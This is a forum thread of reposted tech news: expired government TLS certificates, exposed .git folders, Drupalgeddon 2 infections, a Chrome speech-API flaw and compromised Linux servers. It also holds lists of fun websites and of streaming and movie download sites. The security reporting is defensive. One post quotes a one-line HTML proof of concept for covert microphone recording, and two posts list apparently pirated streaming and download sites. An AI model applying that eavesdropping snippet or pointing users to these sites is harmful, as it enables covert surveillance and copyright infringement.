  10. Over 80 government websites are down after TLS certificates expired and there's nobody on hand to renew them. More than 80 TLS certificates used by US government websites have expired so far without being renewed, leaving some websites inaccessible to the public. NASA, the US Department of Justice, and the Court of Appeals are just some of the US government agencies currently impacted, according to Netcraft. The blame falls on the current US federal government shutdown caused by US President Donald Trump's refusal to sign any 2019 government budget bill that doesn't contain funding for a Mexico border wall he promised during his election campaign. This has resulted in hundreds of thousands of government workers being furloughed across all government agencies, including staff handling IT support and cybersecurity. As a result, government websites are dropping like flies, with no one being on hand to renew TLS certificates. Websites with expired certificates where admins followed proper procedures and implemented correctly-functioning HSTS (HTTP Strict Transport Security) policies are down for good, and users can't access these portals, not even to browse for basic information. Government websites with expired TLS certificates but which didn't implement HSTS show an HTTPS error in users' browsers, but this error can be bypassed to access the site via HTTP. Nevertheless, visitors are warned not to log in or perform any sensitive operations on these sites, as traffic and authentication credentials aren't encrypted and could be intercepted by threat actors. Visiting and browsing content is fine, but users should also be aware that all websites will not be actively managed and there won't be employees on hand to process requests or update sites with the latest correct information. The current government shutdown has been a disaster on the cybersecurity front so far. Experts from multiple cyber-security firms have warned that this would be the perfect time for hostile countries to carry out cyber-attacks against the US government, as agencies are understaffed and IT infrastructure is left largely unattended. According to Axios, the Department of Homeland Security's newly created Cybersecurity and Infrastructure Security Agency (CISA) has had 43 percent of its staff, which amounts to roughly 1,500 employees, sent home. The National Institute of Standards and Technology, which puts together and manages many security standards, has also kept only 49 employees of its normal 3,000. But besides the losses in current personnel, government agencies have also missed an important opportunity for recruiting new cyber-security talent this winter, according to CyberScoop. No representatives for the FTC, NIST, the State Department, or CISA were present at booths at an important cyber-related student recruiting event held in Washington this year. In the end, nothing good will come out of this shutdown. May it be a cyber-attack that goes undetected or agencies losing cyber-security personnel leaving for the private sector, the ripple effects of this shutdown will haunt agencies for months or years to come. Source
  11. The internet is an amazing place where you can find more than 1 billion websites. Along with some fantastic sites there are some weird ones too. It’s impossible for a person to visit every website. Therefore we have gathered some strange websites on the internet. Some of them are funny, some are really boring and a few are like you can’t answer why they exist. We haven’t included adult site here, so you can click on all link without any hesitation. Enjoy the list! 1. Iloveyoulikeafatladylovesapples: Feel the hunger of the fat lady until you let her eat enough apples. The website is completely useless still you can enjoy the graphics and background music. 2. Thenicestplaceontheinter.net: The really sweet website that offers free hugs. Go get it. 3. SciencevsMagic.net/Tes: You can mix the words amazing and weird to describe this one. Also, the website gave AIDS to my eyes. 4. Michaeljfoxnews: Feel the earthquake on your computer. 5. Pointerpointer: I don’t know where did they find these pictures but this is how you get to the specific point. 6. Heeeeeeeey: Just click on link and get the heeey hooo party feel. 7. wwwdotcom: A serious tip for you. 8. Rainymood: Rain makes everything better. So just sit back and enjoy the sound effect to enlighten your mood. 9. Isitchristmas: The name suggests all. May be the website has been designed for people suffering from short term memory loss. 10. Cat-bounce: And that’s how humans play with emotions of cats. 11. 111111111111111111111111111111111111111111111111111111111111: Believe me; I have no idea what the exact purpose of website. But it seems like website owner is not really a fan of Arnold Schwarzenegger. 12. Heyyeyaaeyaaaeyaeyaa: A catchy music with special cartoon characters for our special readers. 13. Thisman: This is the height of weirdness! The website says that hundreds of people dream about this face. No, I don’t. 14. Breakglasstosoundalarm: The thing you wanted to do once in your life is here. 15. Internetlivestats: I don’t think this is a live data, however you will get an idea of few internet stats. 16. Simonpanrucker: No words to explain this useless thing. Kindly decide yourself how weird it is. 17. Ilooklikebarackobama: You might wanna reply this website, “No you don’t, not even a bit”. 18. Corgiorgy: The cute dog army. 19. Haneke: If you like complicated things and pay too much attention into details, you won’t regret after visiting this website. 20. Fearthegaychicken: The question is what makes you think that this chicken is gay. Is it background color or the sound? 21. Koalastothemax: An amazing creativity and fun with pixels. 22. Procatinator: Cats popularity is increasing day by day and somehow this website is the reason behind it. 23. Youfellasleepwatchingadvd: If your mom doesn’t allow you to watch TV, you could spend some time here. 24. Essaytyper: This is the place where you become a professional typist in no time. 25. Feedthehead: My advice is, don’t just feed the head, play with the whole face. 26. Nooooooooooooooo: If your boss gives you extra workload, you can reply him this link. 27. Zoomquilt: The weirdness tends to infinity. Even a telescope can’t look so far. 28. Staggeringbeauty: Just shake the mouse and see the snake’s reaction. 29. Anasomnia: This is how dreams become nightmare. 30. Eelslap: Slap tight as many times as you want. He won’t mind. Source
  12. TV and Sport events http://www.rojadirecta.me/ http://88.80.11.29/ http://www.streamhunter.eu http://zonytvcom.info/ http://www.livestation.com/ (News Channels) https://www.youtube.com/live/all http://www.justin.tv/ http://www.ustream.tv http://aflam4you.tv/index.html (Arabic Channels + beIN Sports channels) http://www.kakibara.com/ http://www.stream2watch.me/ http://www.hahasport.com/ http://www.firstrow1.eu/ http://tvtoss.com/ Movies http://www.movie4k.to/ Movies Subtitles http://subscene.com/ Football highlights http://footyroom.com/ Updated: Download Music: http://beemp3.com http://mp3lx.com/ http://mp3skull.com/ http://www.mp3toss.com Updated 2: Watch TV on Android 1- Download IPTV App from Playstore 2- Download TV playlists and add them to the App, Here a good website for the playlists NB: You can try another app called Kodi, it's available for Windows too but did not tried it yet Updated 3: http://www.streamgaroo.com/
  13. Open .git directories are a bigger cybersecurity problem than many might imagine, at least according to a Czech security researcher who discovered almost 400,000 web pages with an open .git directory possibly exposing a wide variety of data. Vladimír Smitka began his .git directory odyssey in July when he began looking at Czech websites to find how many were improperly configured and allow access to their .git folders within the file versions repository. Open .git directories are a particularly dangerous issue, he said, because they can contain a great deal of sensitive information. “Information about the website’s structure, and sometimes you can get very sensitive data such as database passwords, API keys, development IDE settings, and so on. However, this data shouldn’t be stored in the repository, but in previous scans of various security issues, I have found many developers that do not follow these best practices,” Smitka wrote. Smitka queried 230 million websites to discover the 390,000 allowing access to their .git directories. The vast majority of the websites with open directories had a .com TLD with .net, .de, .org and uk comprising most of the others. What tends to happen is developers leave the .git folder in a publicly accessible portion of their site and when they go to verify whether or not the folder is protected many are fooled when they use <web-site>/.git/ and receive an Error 403 message. Smitka noted that this might make it appear as if the folder is inaccessible, but in fact the error message is a false positive. “Actually, the 403 error is caused by the missing index.html or index.php and disabled autoindex functionality. However, access to the files is still possible,” he said adding the files can possibly even be viewable on Google. Instead he recommends using <web-site>/.git/HEAD to ensure the folder is secure. During his scanning process he was able to find 290,000 email address in the directories, so he set about trying to warn as many people as possible about their website’s vulnerabilities. He boiled the initial list down to about 90,000 addresses by eliminating machine addresses and those associated with multiple domains. In the end 18,000 were kicked back as undeliverable. “After sending the emails, I exchanged about 300 additional messages with affected parties to clarify the issue. I have received almost 2,000 thank-you emails, 30 false positives, 2 scammer/spammer accusations, and 1 threat to call the Canadian police,” Smitka said. The emails contain a link to a page Smitka created that explained and contained a mitigation for the problem. Source
  14. Despite the fact that the Drupal exploit was reported-and patched-in March 2018, some 115,000 websites are still vulnerable. An exploit found in popular content management system (CMS) Drupal that makes it trivially easy for attackers to execute arbitrary code is still causing massive amounts of trouble three months after being discovered. As reported by researchers from Malwarebytes Labs, the attack known as Drupalgeddon 2 has infected over 900 websites with malware, primarily in the form of cryptominers that max out visitor CPUs in order to mine cryptocurrency. While many infected websites simply appear to test domains set up and abandoned on Amazon Web Services, many legitimate sites are infected, including high-profile pages operated by the Arkansas state government and the University of Southern California. A full list of infected websites can be found here, and anyone running an outdated version of Drupal should check to be sure they aren't listed. Just because your website isn't listed doesn't mean its administrators are off the hook: Security researcher Troy Mursch said that the number of vulnerable websites is greater than 115,000, leaving plenty of internet real estate left to infect. The anatomy of a Drupal disaster It makes sense that a remote code execution vulnerability would go unresolved for so long on a Drupal website, at least from the perspective of Jérôme Segura of Malwarebytes Labs. "Updating or upgrading Drupal may have side effects, such as broken templates or functionality, which is why you need to make a full back up and test the changes in the staging environment before moving to production," Segura said in a Malwarebytes Labs blog post. The frustration and extra work that come with a CMS upgrade is well known to anyone who works with one, so it makes sense that updates would be avoided until absolutely necessary. Unfortunately for those still running Drupal versions older than 7.5.9, this is one of those instances. Outdated versions of Drupal seem commonplace—Malwarebytes Labs even reported that 30% of those infected by Drupalgeddon 2 were running some version of Drupal 7.3, which was last updated in 2015. As reported by TechRepublic when Drupalgeddon 2 was first revealed in March 2018, "The vulnerability relates to a conflict between how PHP handles arrays in parameters, and Drupal's use of the hash (#) in at the beginning of array keys to signify special keys that typically result in further computation, leading to the ability to inject code arbitrarily." An attacker has no need to authenticate with Drupal to perform the exploit—they just have to visit a page with a maliciously crafted URL. This isn't the first time that a widespread exploit has been successful due to the failure of IT to install needed security updates: Perhaps the most well-known incident to happen due to similar causes was the GoldenEye/Peyta outbreak in 2017. That's just a single example, and it isn't the only one. Ransomware proliferates largely due to unpatched systems, and the US Government even released a report saying that botnets are successful in part due to exploiting known vulnerabilities. There's no excuse for this kind of attack: The vulnerability is known and its patch is available. Yes, installing it might be a headache and necessitate more work, but as has been stated before, taking the effort to patch now will prevent your having to recover later. You can get the latest versions of Drupal here. The big takeaways for tech leaders: A three-month-old Drupal exploit has spread to over 900 websites, infecting them with cryptominers and other malware. A patch for the vulnerability has been available since March 2018. Drupal administrators need to update to the latest version now to prevent becoming a victim of this "trivially easy" exploit. Source
  15. Batu69

    Movie Downloading Websites

    When it comes to entertainment nothing can beat the environment and fun provided by movies. There are millions of movies in different categories that you can choose as per your interest. From sci-fi to comedy, from action to suspense, from horror to romantic, everything is out there. You just need to find the right path to watch these movies. If your life is so busy and hectic that you don’t get enough time to go out for movies halls and theater to watch movies, still you can have latest movies in your device so that you can watch it whenever you want you. Today, I am sharing best free Hollywood movie downloading websites where you can download latest and old movies in high-definition. 1. My Download Tube My Download Tube is free movie downloading website that provides the latest Hollywood and Bollywood movies and lets you download for free. If you don’t want to download any movie but want to watch to online, My Download Tube completes your wish and lets you watch them without any registration or sign-up. My Download Tube also provides a section for games where you can check games and download them for free. Or you can simply write your query as movie or game name in the search box to watch what exactly you intend to. 2. YouTube Movies YouTube Movies is one of the sites where you can find out any video, any episode of favorite TV series, movies, songs and lot more. You can use its search box tool to find the link to download full movie. All the movies provided here are good in quality and has full length. You can download YouTube movies by installing Internet Download manager that will automatically prompt you to download movies. 3. Gingle Gingle is another amazing online portal to download the latest movies, not just movie but you can also search for music, listen to streaming online radio stations, play online games, wallpapers and much more. If you are looking for anything specific, just request it on Ginger and the online portal will be delighted to add that. Ginger doesn’t ask you for any registration or to create any account. You can find your favorite stuff that you want to watch easily. 15 Best Free Movie Downloading Websites Of 2016
  16. LeeSmithG

    [Emoticons] Help.

    Has anyone got a text document with the emoticons so I can copy and paste. I have searched and nothing. You know :+) is :+d is :+( is So much appreciated.
  17. Just imagine, you are sitting in front of your laptop and your laptop is listening to your nearby conversations. What if the recorded audio from the system’s microphone is being instantly uploaded to a malicious website? Google has created a speech-recognition Application Programming Interface (API) that allows websites to interact with Google Chrome and the computer’s microphone allows you to speak instead of typing into any text box, to make hands-free web searches, quick conversions, and audio translator also work with them. In January, a flaw was discovered in Google Chrome that enabled malicious websites with speech recognition software to eavesdrop on users’ conversations from background without their knowledge using an outdated Google speech API. CHROME IS LISTENING YOU A new similar vulnerability in Google Chrome has been discovered by Israeli security researcher, Guy Aharonovsky, claimed that the Chrome’s speech-recognition API has a vulnerability that allows attackers to turn victim's machine into a listening port without asking for any permission, even if your microphone is completely disabled. "Even blocking any access to the microphone under chrome://settings/content will not remedy this flaw." he said in a blog post. Reported vulnerability exploits the “-x-webkit-speech” feature of Chrome’s speech-recognition API and allows a malicious web application to eavesdrop in the background without any indication to the user that their microphone is enabled. He has also published a Proof-of-Concept webpage and a video demonstration, designed to work on Chrome for Mac operating system, but the exploit only works for Chrome for any operating system. In demonstration, he has used HTML5 full screen feature to the indication box. “In Chrome all one need in order to access the user’s speech is to use this line of HTML5 code: <input -x-webkit-speech="" /> that’s all; there will be no fancy confirmation screens. When the user clicks on that little grey microphone he will be recorded. The user will see the ‘indication box’ telling him to “Speak now” but that can be pushed out of the screen and / or obfuscated.” He has reported the flaw to Google via Chromium bug tracker. They confirmed the existence of the vulnerability, but assigned it 'low' severity level, that means Google will not offer any immediate fix for this flaw.Source
  18. If you're interested in building your own website, or developing a web app or service for others to use, you'll need to get familiar with how the web works and the tools you'll need to develop for it. Mozilla's Webmaker project can help you learn, with fun, interactive activities and lesson plans designed for people of all skill levels. Webmaker is actually a global project by the folks at Mozilla designed to teach people web literacy—that is, pull back the veil on how the web works and your favorite sites and apps function, and so you can learn to build for the web yourself. The general idea, according to Mozilla, is that there's no better way to learn the mechanics and culture of the web than by playing around and hacking it in a safe, fun environment. Webmaker has three major components—the Thimble interactive, collaborative code editor that demystifies HTML, CSS, and Javascript, and corrects you as you write it (and shows you the results of what you write as you write it), X-Ray Goggles, which lets you view the source of any element on a web page—then change and tweak it to see what effect it would have on a real website, and Popcorn, an HTML5 media tool that shows you how to layer videos, images, audio embeds, and other rich media on web sites. The Thimble editor just picked up an educational award, and the whole project is designed to break from a simple cirriculum of lessons (a la Codecademy and the like) and instead focus on getting hands-on with web design and development. If you're interested, or thinking about building your own website or webapps, it's worth a look. Hit the link below for more information. Webmaker Source
  19. Threat researchers from Cisco have shared details on a new and rapidly spreading attack targeting web servers running on systems powered by outdated versions of Linux. According to Cisco, upward of 400 different hosts were affected each day on March 17 and 18, with attackers successfully compromising more than 2,700 URLs at the time of publishing. The attackers are compromising legitimate websites, Cisco said, with most of the affected web servers running on the Linux 2.6 kernel—an outdated version that was first released in 2003. The location of compromised servers have been found throughout the world, but have a particularly high concentration in Germany and the United States. “It is possible that attackers have identified a vulnerability on the platform and been able to take advantage of the fact that these are older systems that may not be continuously patched by administrators,” Cisco’s Martin Lee wrote in a blog post late Thursday. In order to execute the attack, cybercriminals compromise an existing website, insert a line of JavaScript to multiple .js files hosted on the site, causing visitors to load and execute a new JavaScript file served from compromised third-party host. “We observed the second stage sites serving what appears to be pay per view fraud pages, where the visitor’s browser loads multiple advertisements to generate revenue for the attacker,” Lee said. “However, there is anecdotal evidence that visitors have been infected with Trojan malware as part of this final step.” Many of the affected hosts have been identified as compromised and cleaned, Cisco said. Lee explained that some security products may detect the JavaScript redirect as being similar to that previously used in the Blackhole exploit kit, but Cisco has no evidence suggesting that the attacks are related to Blackhole rather than an example of code reuse. “This large scale compromise of an aging operating system, highlights the risks posed by leaving such systems in operation,” Lee said. "Systems that are unmaintained or unsupported are no longer patched with security updates," he continued. "When attackers discover a vulnerability in the system, they can exploit it at their whim without fear of it being remedied. In April 2014, Windows XP will become unsupported. Organizations urgently need to review their use of unsupported systems in operation. Such systems need to be upgraded where possible, or regularly monitored to detect compromise. Just yesterday, researchers from Imperva issued a threat advisory about an old PHP vulnerability that was patched in 2012 but actively being exploited in attacks. While this particular PHP flaw was discovered in March 2012 and patched in May, a public exploit began making the rounds in October 2013, Imperva said in its advisory. Imperva's honeypots detected more than 30,000 campaigns using some form of the exploit within three weeks of its publication. The fact that the exploit became publicly available more than a year later suggests criminals were still enjoying some degree of success targeting this vulnerability, Barry Shteiman, director of security strategy at Imperva, told SecurityWeek. “Large numbers of vulnerable unpatched systems on the Internet are tempting targets for attackers,” Cisco’s Lee said. “Such systems can be used as disposable one-shot platforms for launching attacks. This makes it all the more important that aging systems are properly maintained and protected.” Cisco has provided a list of compromised URLs here and here, which can be used for blacklisting and URL filtering in order to prevent users from visiting those pages. Earlier this week, ESET warned of a widespread attack campaign that has infected more than 25,000 Linux and UNIX servers around the world. According to ESET, the servers are being hijacked by a backdoor Trojan as part of a campaign the researchers are calling 'Operation Windigo.' Once infected, victimized systems are leveraged to steal credentials, redirected web traffic to malicious sites and send as much as 35 million spam messages a day. Source
  20. Trying to enumerate the compromised sites on the Internet is a Sisyphian task. Luckily, it’s not a task that anyone really needs to perform any longer, especially now that Barracuda Labs has released its new Threatglass tool, a Web-based frontend that allows users to query a massive database of compromised sites to get detailed information on the malicious activity and the threats to visitors to those sites. Barracuda has been using its technology to scan millions of Web sites every week, looking for malicious activity on legitimate sites. Typically, the tools scan the Alexa top 25,000 sites, along with other suspicious sites. The system hits the sites using a normal browser and waits to see what kind of actions the sites may take, looking for malicious activity like sites serving exploits or trying to download files to visitors’ machines. Now, the company has built a GUI for this system and exposed to the Web so that users and researchers can search the database, dating back to 2011, looking for current or historic compromise data. Threatglass is set up to give users a variety of information about a give compromised site, including the number of URLs requested and whether the site downloads a binary. The tool also enables researchers to download a packet capture for a given site. “Threatglass provides detailed information of what happened when visiting each of the infected websites on a given date, such as the screenshots of the browser, whether binary was downloaded or any emails were sent, and number of domains and objects requested. Meanwhile, the requested URLs and anomalous netflow information are presented on each of the infection incident reports. Most importantly, the network package captured during the whole visiting process is freely downloadable, which we’ve found to be well received by many security researchers in the community,” Barracuda Labs said in a blog post. “With various representations of network traffic including DNS, HTTP, and netflow in both graphical and textual formats displayed to users, we believe that this tool can greatly help casual users to know which websites had been infected, explore how infected websites could damage their browsers and computers, and understand the trending volumes and impacts of malicious websites on the Internet.” The site’s format also allows users to browse through the most recent group of compromised sites on the home page in a tiled format. The screenshots on the site are obscured until users manually move the window shade, mainly because a good portion of compromised sites contain adult content. Barracuda Labs often comes across well-known, highly trafficked sites that have been compromised, including the recent example of Cracked.com, the popular humor site. The site, which is ranked in the Alexa top 300, was found to be compromised last fall and was still serving malware earlier this year. The malicious component on the site was serving exploits to visitors via Javascript. Barracuda also discovered similar compromises of PHP.net and the Hasbro site. Users of Threatglass also can submit suspicious URLs to Barracuda through the site. Source
×
×
  • Create New...